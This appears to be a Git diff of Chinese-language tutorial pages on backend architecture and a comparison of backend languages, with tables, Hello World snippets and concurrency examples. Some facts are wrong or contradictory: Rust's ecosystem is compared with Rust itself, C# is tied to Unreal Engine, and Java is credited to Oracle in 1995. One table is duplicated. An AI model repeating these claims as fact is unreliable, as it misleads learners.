- **潮汐流量**:比如外卖软件,中午流量大,半夜没人。Serverless 会自动在中午为你分配 1000 台机器,半夜缩减到 0 台
- **事件驱动**:比如"用户上传图片后,自动压缩图片"。
- **快速验证**:小团队、MVP、黑客松项目。
<ServerlessCostAutoScaleDemo />
### 4.3 BaaS 组合拳
Serverless 的真正力量来自于 **BaaS (Backend as a Service)**
- 登录 -> Auth0 / Supabase Auth
- 支付 -> Stripe
- 数据库 -> Supabase / Firebase / DynamoDB
- 消息 -> Kafka / SQS
**关键点**Serverless 让后端越来越像"搭积木"。
---
## 4. 总结
## 5. 必备基础设施:后端"内功"
无论架构怎么变,一些基础能力始终存在。
### 5.1 负载均衡 (Load Balancer)
像"大堂经理"一样,把客人平均分配给不同窗口,避免某个窗口排队爆炸。
### 5.2 缓存 (Cache)
像"备菜"一样,把常用的热菜放在餐台边上(Redis / CDN),省得每次都从厨房重做。
<CacheHitRatioDemo />
### 5.3 消息队列 (MQ)
像"取号机"一样,把高峰期的订单排队处理,避免系统被瞬间击穿(Kafka / RabbitMQ)。
### 5.4 数据库分工
- **关系型 (MySQL / Postgres)**:订单、支付、用户信息。
- **NoSQL (Redis / MongoDB)**:缓存、日志、推荐特征。
**关键点**:这些"内功"决定了系统的**性能、稳定性、成本**。
---
## 6. 现代开发方式:DevOps / CI/CD / 可观测
后端架构的进化,不只是技术栈变化,还包括开发流程变化。
### 6.1 DevOps:开发与运维合体
开发不再只是写代码,还要关心部署、监控、告警。
### 6.2 CI/CD:自动化流水线
- 代码提交 -> 自动测试
- 测试通过 -> 自动部署
- 出问题 -> 自动回滚
### 6.3 可观测性 (Observability)
现代后端需要三件套:
- **日志 (Logs)**:发生了什么?
- **指标 (Metrics)**:系统状态如何?
- **链路追踪 (Tracing)**:一次请求在系统内走过了哪些服务?
---
## 7. 进阶趋势:边缘计算与平台工程
### 7.1 Edge / 边缘计算
把计算放在离用户更近的地方(边缘节点),实现更低延迟。
### 7.2 平台工程 (Platform Engineering)
大厂会搭建内部平台:
- 给业务团队提供一键部署、一键监控。
- 把复杂性"下沉"到平台,让业务更专注。
---
## 8. 总结与学习路线
后端架构的演进,本质上是在做**加法**和**减法**:
| 时代 | 架构 | 开发者要做的事 | 运维要做的事 |
| :--- | :--- | :--- | :--- |
| **单体时代** | 一整块 | 写所有业务逻辑 | 维护一台大服务器 |
| **微服务时代** | 拆分 | 关注单一业务 | 维护 K8s 集群 (很累!) |
| **Serverless** | 函数 | 只写核心函数 | 喝茶 (云厂商全包了) |
| 时代 | 架构 | 开发者要做的事 | 运维要做的事 |
| :------------- | :----- | :--------------- | :-------------------- |
| **物理时代** | 单机 | 写脚本、手动部署 | 维护机房与硬件 |
| **单体时代** | 一整块 | 写所有业务逻辑 | 维护几台大服务器 |
| **微服务时代** | 拆分 | 关注单一业务 | 维护 K8s 集群 (很累!) |
| **Serverless** | 函数 | 只写核心函数 | 喝茶 (云厂商全包了) |
**下一步建议**
- 想打基础:学会 HTTP、数据库、缓存、消息队列。
- 想上手实践:用 Docker 跑一个小项目,再部署到云端。
- 想更专业:了解 K8s、监控体系、CI/CD 流水线。
未来的后端开发,将越来越像"搭积木"——你只需要关注**业务逻辑**,底层的脏活累活,全部交给云。
---
## 9. 名词速查表 (Glossary)
| 名词 | 全称 | 解释 |
| :---------------- | :-------------------------------- | :--------------------------------------------------- |
| **Backend** | - | 服务器端系统,负责处理业务逻辑、数据存储和对外接口。 |
| **CGI** | Common Gateway Interface | 早期动态网页技术,通过脚本处理请求并返回结果。 |
| **Monolith** | - | 单体架构,把所有业务逻辑打包在同一个应用中。 |
| **Microservices** | - | 微服务架构,把业务拆分成多个独立服务。 |
| **Container** | - | 容器化技术,把应用和依赖打包成可移植单元。 |
| **K8s** | Kubernetes | 容器编排平台,用于调度、扩缩容和治理容器。 |
| **Service Mesh** | - | 服务网格,负责微服务间通信治理、观测与安全。 |
| **Serverless** | - | 无服务计算,开发者只写函数,平台自动运行与扩缩容。 |
| **BaaS** | Backend as a Service | 即插即用的后端云服务(认证、数据库、支付等)。 |
| **CI/CD** | Continuous Integration / Delivery | 持续集成与持续交付,自动化测试与部署流程。 |
| **Observability** | - | 可观测性,利用日志/指标/追踪理解系统运行状态。 |
docs/zh-cn/appendix/backend-languages.md
+940
View File
@@ -0,0 +1,940 @@
# 后端编程语言:从 Java 到 Go (Interactive Guide to Backend Languages)
> 💡 **学习指南**:本章节无需编程基础,通过交互式演示带你全面了解主流后端编程语言的特点、应用场景和选择策略。我们将深入对比 Java、Python、Go、Node.js 等语言的优劣势。
<BackendLanguagesDemo />
## 0. 引言:为什么有这么多语言?
你可能在技术博客或招聘要求中见过这些名字:Java、Python、Go、Node.js、C#、Rust...
**为什么后端编程语言这么多?**
因为**不同的时代有不同的需求**,不同的场景有不同的最优解。
- **1995 年**:互联网刚起步,Java 诞生了,主打"一次编写,到处运行"
- **2000s**Google 需要 C++ 的性能,但不要 C++ 的复杂度,于是 Go 在 2009 年诞生
- **2010s**Node.js 让前端工程师也能写后端,全栈时代到来
- **2020s**Rust 带来内存安全的同时保持 C++ 的性能
### 核心观点
**没有最好的语言,只有最适合的语言。**
选择后端语言时,你需要权衡:
| 维度 | 说明 | 例子 |
| :----------- | :------------------------------------- | :----------------------- |
| **性能** | 运行速度、资源消耗 | Go > Java > Python |
| **开发效率** | 写代码的速度、代码简洁度 | Python > Ruby > Go |
| **生态成熟度** | 可用的库、框架、社区支持 | Java > Python > Node.js |
| **学习曲线** | 从零到能写项目的时间 | Python < Go < Rust |
| **并发模型** | 处理大量请求的能力 | Go (协程) > Java (线程) |
| **团队背景** | 团队成员熟悉什么语言 | 选团队最熟悉的 |
**关键点**:在后端开发中,**语言的选择往往次于架构设计**。一个设计糟糕的 Java 系统,性能远不如一个设计优秀的 Python 系统。
---
## 1. 主流后端语言概览
### 1.1 Java - 企业级开发的霸主
**诞生时间**1995 年(Oracle
**核心特点**:跨平台、强类型、静态类型、面向对象
#### 为什么 Java 能统治企业级开发?
- **JVM (Java Virtual Machine)**:一次编译,到处运行
- **强类型系统**:编译时就能发现大量错误
- **成熟的生态**:Spring 全家桶、海量开源库
- **高性能**JIT (Just-In-Time) 编译器让 Java 接近 C++ 性能
#### 典型应用场景
- **大型企业系统**:银行、保险、电商平台
- **Android 开发**:虽然 Kotlin 在崛起,但 Java 仍是主力
- **大数据处理**Hadoop、Spark 的核心语言
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 生态极其成熟,框架完备 | ❌ 代码冗长,样板代码多 |
| ✅ 强类型,编译时检查 | ❌ 启动慢,内存占用高 |
| ✅ 多线程成熟 | ❌ 学习曲线陡峭(Spring 全家桶) |
| ✅ 跨平台,JVM 优化强大 | ❌ 版本更新快,兼容性问题 |
---
### 1.2 Python - AI 与脚本之王
**诞生时间**1991 年(Guido van Rossum
**核心特点**:简洁、动态类型、解释型
#### 为什么 Python 如此流行?
- **极简语法**:像读英语一样简单
- **AI 生态**NumPy、Pandas、PyTorch、TensorFlow
- **快速开发**:用 1 行 Python 完成的工作,Java 可能需要 10 行
#### 典型应用场景
- **AI/ML**:几乎所有 AI 框架的首选语言
- **数据分析**Pandas、Jupyter Notebook
- **脚本自动化**:运维脚本、数据处理
- **Web 开发**Django、Flask(但性能不如 Java/Go
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 语法简单,学习曲线平缓 | ❌ 运行速度慢(比 Java/Go 慢 10-100 倍) |
| ✅ AI 生态无与伦比 | ❌ 动态类型,运行时错误多 |
| ✅ 快速开发,代码量少 | ❌ GIL 限制,多线程性能差 |
| ✅ 社区活跃,库丰富 | ❌ 打包部署复杂(依赖地狱) |
---
### 1.3 Go (Golang) - 云原生时代的宠儿
**诞生时间**2009 年(Google
**核心特点**:简洁、高性能、原生并发
#### 为什么 Go 成为云原生首选?
- **Goroutine (协程)**:轻松处理百万级并发
- **简洁语法**:25 个关键字,学习曲线平缓
- **快速编译**:比 Java 快 10 倍以上
- **单一可执行文件**:编译后就是一个二进制文件,无需运行时
#### 典型应用场景
- **云原生基础设施**Docker、Kubernetes 都是用 Go 写的
- **微服务**:高性能、轻量级
- **DevOps 工具**Terraform、Prometheus
- **区块链**Hyperledger Fabric
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 原生并发,性能接近 C++ | ❌ 生态不如 Java/Python 成熟 |
| ✅ 简洁语法,学习曲线平缓 | ❌ 错误处理繁琐(if err != nil |
| ✅ 编译快,部署简单 | ❌ 泛型支持较弱(Go 1.18+ 才引入) |
| ✅ 单一可执行文件,无依赖 | ❌ 不如 Java/Python 灵活 |
---
### 1.4 JavaScript/Node.js - 全栈工程师的利器
**诞生时间**2009 年(Ryan Dahl
**核心特点**:事件驱动、非阻塞 I/O、前后端统一
#### 为什么 Node.js 改变了游戏规则?
- **前后端统一**:前端工程师可以直接写后端
- **NPM 生态**:世界上最大的包管理器
- **实时应用**:WebSocket、聊天应用、协作工具
#### 典型应用场景
- **全栈 Web 应用**React + Node.js + MongoDB
- **实时系统**:聊天应用、在线协作
- **Serverless**AWS Lambda、Vercel Functions
- **CLI 工具**VS Code、Webpack 都是用 Node.js 写的
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 前后端统一,减少语言切换成本 | ❌ 单线程,CPU 密集型任务性能差 |
| ✅ NPM 生态庞大,库丰富 | ❌ 回调地狱(虽然 async/await 有改善) |
| ✅ 适合 I/O 密集型应用 | ❌ 动态类型,运行时错误多 |
| ✅ 社区活跃,更新快 | ❌ 版本兼容性问题多 |
---
### 1.5 C#/.NET - Windows 生态的王者
**诞生时间**2000 年(Microsoft
**核心特点**:强类型、面向对象、跨平台(.NET Core)
#### 为什么 C# 值得关注?
- **微软背书**Visual Studio 极其强大
- **跨平台**.NET Core 让 C# 跑在 Linux/Mac 上
- **高性能**CoreFX 优化,性能接近 Java
- **Unity 游戏开发**C# 是 Unity 的官方语言
#### 典型应用场景
- **Windows 应用**:桌面软件、企业系统
- **游戏开发**Unity、Unreal Engine
- **Web 开发**ASP.NET Core(性能极高)
- **Azure 云服务**:微软云的首选语言
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ Visual Studio 极其强大 | ❌ Windows 历史包袱重 |
| ✅ ASP.NET Core 性能优秀 | ❌ 社区不如 Java/Python 活跃 |
| ✅ 跨平台(.NET Core | ❌ 学习曲线陡峭 |
| ✅ 游戏开发(Unity) | ❌ 开源生态相对较弱 |
---
### 1.6 Ruby - 快速开发的典范
**诞生时间**1995 年(Yukihiro Matsumoto
**核心特点**:简洁、优雅、动态类型
#### 为什么 Ruby 曾如此流行?
- **Ruby on Rails**2005 年的"杀手级框架"
- **约定优于配置**:减少决策疲劳
- **快速开发**:用极少代码实现功能
#### 典型应用场景
- **初创公司**GitHub、Airbnb、Shopify 的早期版本
- **快速原型**:MVP、黑客松项目
- **Web 开发**Rails、Sinatra
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ Rails 框架极其成熟 | ❌ 性能较差(比 Python/Node.js 还慢) |
| ✅ 快速开发,代码优雅 | ❌ 动态类型,运行时错误多 |
| ✅ 约定优于配置 | ❌ 多线程性能差 |
| ✅ 社区活跃 | ❌ 生态不如 Java/Python 广泛 |
---
### 1.7 PHP - Web 开发的老将
**诞生时间**1995 年(Rasmus Lerdorf
**核心特点**:简单、易部署、专为 Web 设计
#### 为什么 PHP 依然存在?
- **极低门槛**:新手 1 天就能上手
- **部署简单**:复制文件就能跑
- **WordPress**:全球 40% 的网站用 WordPress
#### 典型应用场景
- **中小型网站**:企业官网、博客
- **CMS 系统**WordPress、Drupal
- **快速原型**MVP、小型项目
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 学习曲线平缓 | ❌ 性能较差(比 Python/Node.js 慢) |
| ✅ 部署简单 | ❌ 语言设计混乱 |
| ✅ WordPress 生态强大 | ❌ 不适合大型项目 |
| ✅ 更新快(PHP 8 性能提升大) | ❌ 社区活跃度下降 |
---
### 1.8 Rust - 系统级编程的未来
**诞生时间**2010 年(Mozilla
**核心特点**:内存安全、零成本抽象、高性能
#### 为什么 Rust 如此受关注?
- **内存安全**:编译时保证没有内存泄漏、空指针
- **高性能**:与 C++ 性能相当
- **现代化**:2018 年后成为主流,AWS、微软都在用
#### 典型应用场景
- **系统编程**:操作系统、数据库
- **区块链**Solana、Polkadot
- **WebAssembly**:前端高性能计算
- **基础设施**AWS Firecracker、TiKV
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 内存安全,无 GC | ❌ 学习曲线极其陡峭 |
| ✅ 性能接近 C++ | ❌ 编译时间长 |
| ✅ 现代化语法 | ❌ 生态不如 Go/Rust 成熟 |
| ✅ WebAssembly 支持 | ❌ 开发速度慢 |
---
### 1.9 C++ - 高性能计算的基石
**诞生时间**1985 年(Bjarne Stroustrup
**核心特点**:高性能、底层控制、复杂
#### 为什么 C++ 依然不可或缺?
- **极致性能**:没有任何语言能超越 C++
- **底层控制**:直接操作内存、硬件
- **游戏引擎**Unreal Engine、游戏开发
#### 典型应用场景
- **游戏开发**Unreal Engine、AAA 游戏
- **高频交易**:金融系统、量化交易
- **浏览器引擎**Chrome V8、WebKit
- **AI 框架底层**PyTorch、TensorFlow 的核心
#### 优劣势总结
| 优势 | 劣势 |
| :----------------------------------- | :----------------------------------- |
| ✅ 性能极致 | ❌ 学习曲线极其陡峭 |
| ✅ 底层控制力强 | ❌ 内存管理复杂(易泄漏) |
| ✅ 游戏开发标准 | ❌ 开发效率低 |
| ✅ 生态成熟 | ❌ 不适合 Web 开发 |
---
<LanguageComparisonDemo />
---
## 2. 语言特性对比
### 2.1 性能基准测试
<PerformanceBenchmarkDemo />
#### 性能排行(大致)
```
C++ ≈ Rust > Go > Java ≈ C# > Node.js > PHP > Python > Ruby
```
**但性能不是唯一标准!**
- **大多数 Web 应用**:瓶颈在数据库和网络,不是语言
- **I/O 密集型**Node.js、Go 表现优秀
- **CPU 密集型**Go、C++、Rust 更适合
### 2.2 开发效率对比
<DeveloperEfficiencyDemo />
#### 代码行数对比(实现相同功能)
```
Python: 10 行
Ruby: 12 行
Go: 20 行
Java: 50 行
C++: 80 行
```
**但代码少 ≠ 开发快!**
- **Python**:写起来快,但调试慢(运行时错误)
- **Java**:写起来慢,但调试快(编译时错误)
- **Go**:介于两者之间,平衡点
### 2.3 生态成熟度
<LanguageEcosystemDemo />
#### 包管理器对比
| 语言 | 包管理器 | 包数量 | 更新频率 |
| :---- | :------- | :---------- | :------- |
| Node | NPM | 200万+ | 极高 |
| Python| PyPI | 50万+ | 高 |
| Java | Maven | 30万+ | 中 |
| Go | Go Modules| 10万+ | 高 |
| Rust | Cargo | 10万+ | 极高 |
| Ruby | RubyGems | 15万+ | 中 |
#### Web 框架对比
| 语言 | 主流框架 | 特点 |
| :---- | :------------------- | :----------------------------- |
| Java | Spring Boot | 企业级首选,功能完备 |
| Python| Django / Flask | Django 大而全,Flask 轻量 |
| Node | Express / Nest.js | Express 简单,Nest.js 架构完善 |
| Go | Gin / Echo | 轻量高性能 |
| Ruby | Rails | 约定优于配置 |
| PHP | Laravel | 现代化,易用 |
| C# | ASP.NET Core | 高性能,跨平台 |
### 2.4 并发模型对比
<ConcurrencyModelDemo />
#### 线程 vs 协程 vs 异步
| 语言 | 并发模型 | 特点 | 适用场景 |
| :---- | :---------- | :----------------------------- | :--------------------- |
| Java | 线程池 | 成熟,但资源消耗大 | 传统企业应用 |
| Go | Goroutine | 轻量级,可百万级并发 | 云原生、微服务 |
| Node | 事件循环 | 单线程,非阻塞 I/O | I/O 密集型应用 |
| Python| 多进程 | GIL 限制,多进程开销大 | 数据处理 |
| Rust | Async/Await | 零成本抽象,性能优秀 | 系统编程 |
### 2.5 内存管理对比
<MemoryManagementDemo />
| 语言 | 内存管理 | 特点 | 性能影响 |
| :---- | :----------- | :----------------------------- | :--------------------- |
| Java | GC | 自动管理,但有 STW 停顿 | 中等 |
| Python| GC + 引用计数| 自动管理,但循环引用问题 | 较差 |
| Go | GC | 低延迟 GCGo 1.20+ | 良好 |
| Node | GC | V8 引擎优化,性能不错 | 良好 |
| Rust | 所有权系统 | 编译时保证,无 GC | 极佳 |
| C++ | 手动管理 | 极致性能,但易泄漏 | 极佳(但风险高) |
### 2.6 类型系统对比
| 语言 | 类型系统 | 特点 | 优劣势 |
| :---- | :----------- | :----------------------------- | :--------------------- |
| Java | 静态强类型 | 编译时检查,安全但冗长 | ✅ 安全 ❌ 冗长 |
| Go | 静态强类型 | 简洁,但泛型支持弱 | ✅ 简洁 ⚠️ 泛型弱 |
| Python| 动态强类型 | 灵活,但运行时错误多 | ✅ 灵活 ❌ 不安全 |
| Node | 动态弱类型 | 极其灵活,但容易出错 | ✅ 灵活 ❌ 易出错 |
| Rust | 静态强类型 | 类型系统强大,但学习曲线陡 | ✅ 安全 ❌ 复杂 |
| C# | 静态强类型 | 类型推导优秀,平衡点 | ✅ 安全 ✅ 易用 |
---
## 3. 应用场景对比
### 3.1 Web 开发
<WebDevelopmentScenarioDemo />
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **Java** | ⭐⭐⭐⭐⭐ | 企业级 Web 应用首选 |
| **Node** | ⭐⭐⭐⭐⭐ | 全栈应用、实时系统 |
| **Python**| ⭐⭐⭐⭐ | 快速开发、数据驱动应用 |
| **Go** | ⭐⭐⭐⭐ | 高性能 API、微服务 |
| **Ruby**| ⭐⭐⭐ | 初创公司、快速原型 |
| **PHP** | ⭐⭐⭐ | 中小型网站、CMS |
| **C#** | ⭐⭐⭐⭐ | Windows 生态、企业应用 |
### 3.2 微服务架构
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **Go** | ⭐⭐⭐⭐⭐ | 云原生首选,轻量高性能 |
| **Java**| ⭐⭐⭐⭐ | Spring Cloud 生态成熟 |
| **Node**| ⭐⭐⭐⭐ | 适合 I/O 密集型服务 |
| **Rust**| ⭐⭐⭐ | 性能极致,但开发成本高 |
### 3.3 大数据处理
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **Java**| ⭐⭐⭐⭐⭐ | Hadoop、Spark 核心语言 |
| **Scala**| ⭐⭐⭐⭐⭐ | Spark 原生语言,函数式编程 |
| **Python**| ⭐⭐⭐⭐⭐ | 数据分析、AI 训练 |
| **Go** | ⭐⭐⭐ | 数据采集、流处理 |
### 3.4 AI/ML 机器学习
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **Python**| ⭐⭐⭐⭐⭐ | 绝对统治地位 |
| **C++**| ⭐⭐⭐⭐ | 模型部署、性能优化 |
| **Julia**| ⭐⭐⭐⭐ | 科学计算,性能接近 C++ |
| **R** | ⭐⭐⭐ | 统计分析、学术研究 |
### 3.5 游戏开发
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **C++**| ⭐⭐⭐⭐⭐ | AAA 游戏引擎(Unreal |
| **C#** | ⭐⭐⭐⭐⭐ | Unity 引擎,独立游戏首选 |
| **Lua**| ⭐⭐⭐⭐ | 游戏脚本语言 |
### 3.6 系统编程
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **Rust**| ⭐⭐⭐⭐⭐ | 现代化系统语言 |
| **C++**| ⭐⭐⭐⭐⭐ | 传统系统语言 |
| **Go** | ⭐⭐⭐⭐ | 云原生基础设施 |
| **C** | ⭐⭐⭐⭐⭐ | 操作系统内核 |
### 3.7 脚本自动化
| 语言 | 适用性 | 说明 |
| :---- | :----- | :----------------------------- |
| **Python**| ⭐⭐⭐⭐⭐ | 数据处理、运维脚本 |
| **Bash**| ⭐⭐⭐⭐⭐ | Linux 系统管理 |
| **Node**| ⭐⭐⭐⭐ | 前端工程化工具 |
| **Ruby**| ⭐⭐⭐⭐ | CI/CD 脚本 |
---
## 4. Hello World 对比
<SyntaxComparisonDemo />
### 4.1 代码示例对比
#### Python (最简洁)
```python
print("Hello, World!")
```
#### Go (简洁但严格)
```go
package main
import "fmt"
func main() {
fmt.Println("Hello, World!")
}
```
#### Java (冗长但规范)
```java
public class HelloWorld {
public static void main(String[] args) {
System.out.println("Hello, World!");
}
}
```
#### Node.js (JavaScript)
```javascript
console.log("Hello, World!");
```
#### Rust (复杂但安全)
```rust
fn main() {
println!("Hello, World!");
}
```
#### C# (类似 Java)
```csharp
using System;
class Program {
static void Main() {
Console.WriteLine("Hello, World!");
}
}
```
#### Ruby (优雅)
```ruby
puts "Hello, World!"
```
#### PHP (Web 友好)
```php
<?php
echo "Hello, World!";
?>
```
#### C++ (底层)
```cpp
#include <iostream>
int main() {
std::cout << "Hello, World!" << std::endl;
return 0;
}
```
### 4.2 运行方式对比
| 语言 | 编译/解释 | 运行命令 | 编译时间 |
| :---- | :-------- | :--------------------------- | :------- |
| Python| 解释型 | `python hello.py` | 无 |
| Go | 编译型 | `go run hello.go` | 快(<1s|
| Java | 编译型 | `javac HelloWorld.java && java HelloWorld` | 慢(2-5s|
| Node | 解释型 | `node hello.js` | 无 |
| Rust | 编译型 | `rustc hello.rs && ./hello` | 慢(10-30s|
| C# | 编译型 | `dotnet run` | 中(2-3s|
| Ruby | 解释型 | `ruby hello.rb` | 无 |
| PHP | 解释型 | `php hello.php` | 无 |
| C++ | 编译型 | `g++ hello.cpp -o hello && ./hello` | 中(5-10s|
---
## 5. 并发模型对比
<ConcurrencyComparisonDemo />
### 5.1 线程 (Java)
```java
// Java: 线程池
ExecutorService executor = Executors.newFixedThreadPool(10);
executor.submit(() -> {
System.out.println("Task running");
});
```
**特点**
- ✅ 成熟稳定
- ❌ 线程重(1-2MB 栈空间)
- ❌ 上下文切换开销大
### 5.2 协程 (Go)
```go
// Go: Goroutine
go func() {
fmt.Println("Task running")
}()
```
**特点**
- ✅ 轻量级(2KB 栈空间)
- ✅ 可创建百万级协程
- ✅ 语法简洁
### 5.3 异步 (Node.js)
```javascript
// Node.js: 异步回调
setTimeout(() => {
console.log('Task running');
}, 0);
```
**特点**
- ✅ 适合 I/O 密集型
- ❌ 单线程,CPU 密集型性能差
- ❌ 回调地狱(虽然 async/await 有改善)
### 5.4 Async/Await (Rust/Python)
```rust
// Rust: Async/Await
async fn run_task() {
println!("Task running");
}
run_task().await;
```
**特点**
- ✅ 零成本抽象(Rust
- ✅ 语法清晰
- ⚠️ Python 的 async 性能不如 Go
### 5.5 性能对比演示
下方的演示展示了不同并发模型在处理 1000 个任务时的性能差异。
---
## 6. 生态系统对比
### 6.1 包管理器
<PackageManagerDemo />
| 语言 | 包管理器 | 命令 | 特点 |
| :---- | :--------- | :---------------------------- | :----------------------- |
| Node | npm | `npm install express` | 生态最大,依赖地狱风险 |
| Go | go modules | `go get github.com/gin-gonic/gin` | 简洁,无依赖地狱 |
| Python| pip | `pip install django` | 简单,虚拟环境必需 |
| Java | Maven | `mvn install` | 企业级,依赖管理严格 |
| Rust | Cargo | `cargo add serde` | 现代化,构建工具集成 |
| Ruby | bundler | `bundle install` | Gemfile 管理依赖 |
### 6.2 Web 框架
<WebFrameworkDemo />
#### 性能对比(Requests/sec
```
Go (Gin): 1,000,000+
Rust (Actix): 1,500,000+
C++ (Pistache): 1,200,000+
Node (Fastify): 800,000+
Java (Vert.x): 700,000+
Python (FastAPI): 200,000+
```
**但性能不是唯一标准!**
- **Django/Flask**:开发速度快,适合快速迭代
- **Spring Boot**:企业级功能完备
- **Rails**:约定优于配置,开发体验好
### 6.3 ORM 对比
| 语言 | 主流 ORM | 特点 |
| :---- | :--------------- | :----------------------------- |
| Java | Hibernate / JPA | 成熟,功能强大 |
| Python| SQLAlchemy / ORM | 灵活,支持多种数据库 |
| Go | GORM | 简洁,但功能不如 Java ORM |
| Node | Prisma / TypeORM | Prisma 类型安全,TypeORM 灵活 |
| Ruby | ActiveRecord | Rails 核心,约定优于配置 |
| PHP | Eloquent (Laravel)| Laravel 核心,易用 |
### 6.4 测试框架
| 语言 | 主流测试框架 | 特点 |
| :---- | :--------------- | :----------------------------- |
| Java | JUnit 5 | 企业级,功能完备 |
| Python| pytest | 简洁,插件丰富 |
| Go | testing | 内置,简洁 |
| Node | Jest | 零配置,覆盖率好 |
| Rust | 内置测试框架 | 集成测试,文档测试 |
| Ruby | RSpec | BDD 风格,易读 |
---
## 7. 学习资源与社区
### 7.1 官方文档
| 语言 | 官方文档质量 | 学习曲线 |
| :---- | :----------- | :------------------------- |
| Go | ⭐⭐⭐⭐⭐ | 简洁,官方教程优秀 |
| Python| ⭐⭐⭐⭐⭐ | 完善的官方教程 |
| Rust | ⭐⭐⭐⭐⭐ | "The Rust Book" 极其详细 |
| Node | ⭐⭐⭐⭐ | MDN 文档优秀 |
| Java | ⭐⭐⭐⭐ | Oracle 官方文档完善 |
| C# | ⭐⭐⭐⭐⭐ | Microsoft 文档极其详细 |
### 7.2 推荐书籍
| 语言 | 经典书籍 |
| :---- | :------------------------------------- |
| Go | "The Go Programming Language" |
| Python| "Fluent Python"、"Python Cookbook" |
| Java | "Effective Java"、"Java Concurrency" |
| Rust | "The Rust Programming Language" |
| Node | "Node.js Design Patterns" |
| C# | "C# in Depth" |
### 7.3 在线课程
| 语言 | 平台 | 课程名称 |
| :---- | :-------------------- | :-------------------------------- |
| Python| Coursera | "Python for Everybody" |
| Go | Udemy | "Go: The Complete Developer's Guide"|
| Java | Coursera | "Java Programming and Software Engineering" |
| Rust | Udemy | "The Rust Programming Language" |
| Node | freeCodeCamp | "Node.js API Masterclass" |
### 7.4 社区活跃度
<CommunityActivityDemo />
| 语言 | Stack Overflow | GitHub Stars | 社区氛围 |
| :---- | :------------- | :----------- | :------- |
| Python| #1 最活跃 | #2 | 友好,新手友好 |
| JS | #2 | #1 | 活跃,更新快 |
| Java | #3 | #3 | 企业级,严肃 |
| Go | #4 | #5 | 简洁,务实 |
| Rust | #5 | #4 | 热情,技术驱动 |
---
## 8. 如何选择
<LanguageSelectorDemo />
### 8.1 根据团队背景选择
**第一原则:选团队最熟悉的!**
- **Java 团队**:继续用 Java,除非有特殊需求
- **前端团队**Node.js 让全栈更顺畅
- **初创公司**Python 或 Go(快速开发 + 高性能)
- **企业级**:Java 或 C#(生态成熟)
### 8.2 根据项目类型选择
<ScenarioBasedSelectionDemo />
| 项目类型 | 推荐语言 | 理由 |
| :----------------- | :----------------- | :----------------------------- |
| 企业级 Web 应用 | Java | Spring Boot 生态成熟 |
| 快速原型/MVP | Python / Ruby | 开发速度快 |
| 云原生/微服务 | Go | 轻量高性能 |
| 全栈应用 | Node.js | 前后端统一 |
| AI/ML 项目 | Python | AI 生态无与伦比 |
| 游戏开发 | C++ / C# | 引构支持(Unreal/Unity |
| 系统编程 | Rust / C++ | 内存控制,高性能 |
| 实时系统 | Go / Node.js | 并发性能好 |
### 8.3 根据性能要求选择
| 性能要求 | 推荐语言 | 理由 |
| :----------- | :----------------- | :----------------------------- |
| 极致性能 | C++ / Rust | 零开销抽象 |
| 高性能 | Go / Java | 性能优秀,开发效率高 |
| 中等性能 | Node.js / C# | 性能足够,生态好 |
| 性能不敏感 | Python / Ruby | 开发速度快 |
### 8.4 决策树
<LanguageDecisionTreeDemo />
```
开始
需要极致性能?
├─ 是 → 需要内存安全?
│ ├─ 是 → Rust
│ └─ 否 → C++
└─ 否 → 需要快速开发?
├─ 是 → 团队有前端背景?
│ ├─ 是 → Node.js
│ └─ 否 → Python
└─ 否 → 需要企业级功能?
├─ 是 → Java / C#
└─ 否 → Go
```
### 8.5 真实案例
#### GitHub 的技术栈
- **早期**Ruby on Rails(快速开发)
- **现在**Ruby + Go(性能优化)
#### Google 的技术栈
- **核心**C++(搜索算法)
- **云平台**GoKubernetes、Docker
- **AI**PythonTensorFlow
#### Netflix 的技术栈
- **后端**JavaSpring Boot
- **前端**Node.js
- **数据**Python
#### Dropbox 的技术栈
- **核心**Python(早期)
- **性能优化**Go(后期迁移)
---
## 9. 总结与建议
### 9.1 快速参考表
| 语言 | 性能 | 开发效率 | 生态 | 学习曲线 | 推荐场景 |
| :---- | :--- | :------- | :--- | :------- | :--------------------------- |
| **Java** | ⭐⭐⭐⭐ | ⭐⭐⭐ | ⭐⭐⭐⭐⭐ | ⭐⭐ | 企业级、大型系统 |
| **Python**| ⭐⭐ | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ | AI/ML、快速开发 |
| **Go** | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ | 云原生、微服务 |
| **Node.js**| ⭐⭐⭐ | ⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐ | 全栈、实时应用 |
| **C#** | ⭐⭐⭐⭐ | ⭐⭐⭐ | ⭐⭐⭐⭐ | ⭐⭐⭐ | Windows、Unity、企业级 |
| **Ruby**| ⭐⭐ | ⭐⭐⭐⭐⭐ | ⭐⭐⭐ | ⭐⭐⭐⭐⭐ | 快速原型、初创公司 |
| **PHP** | ⭐⭐ | ⭐⭐⭐⭐ | ⭐⭐⭐ | ⭐⭐⭐⭐⭐ | 中小型网站、CMS |
| **Rust**| ⭐⭐⭐⭐⭐ | ⭐⭐ | ⭐⭐⭐ | ⭐ | 系统编程、区块链 |
| **C++**| ⭐⭐⭐⭐⭐ | ⭐⭐ | ⭐⭐⭐⭐⭐ | ⭐ | 游戏开发、高频交易 |
### 9.2 学习路线建议
#### 初学者路线
1. **Python**:建立编程概念
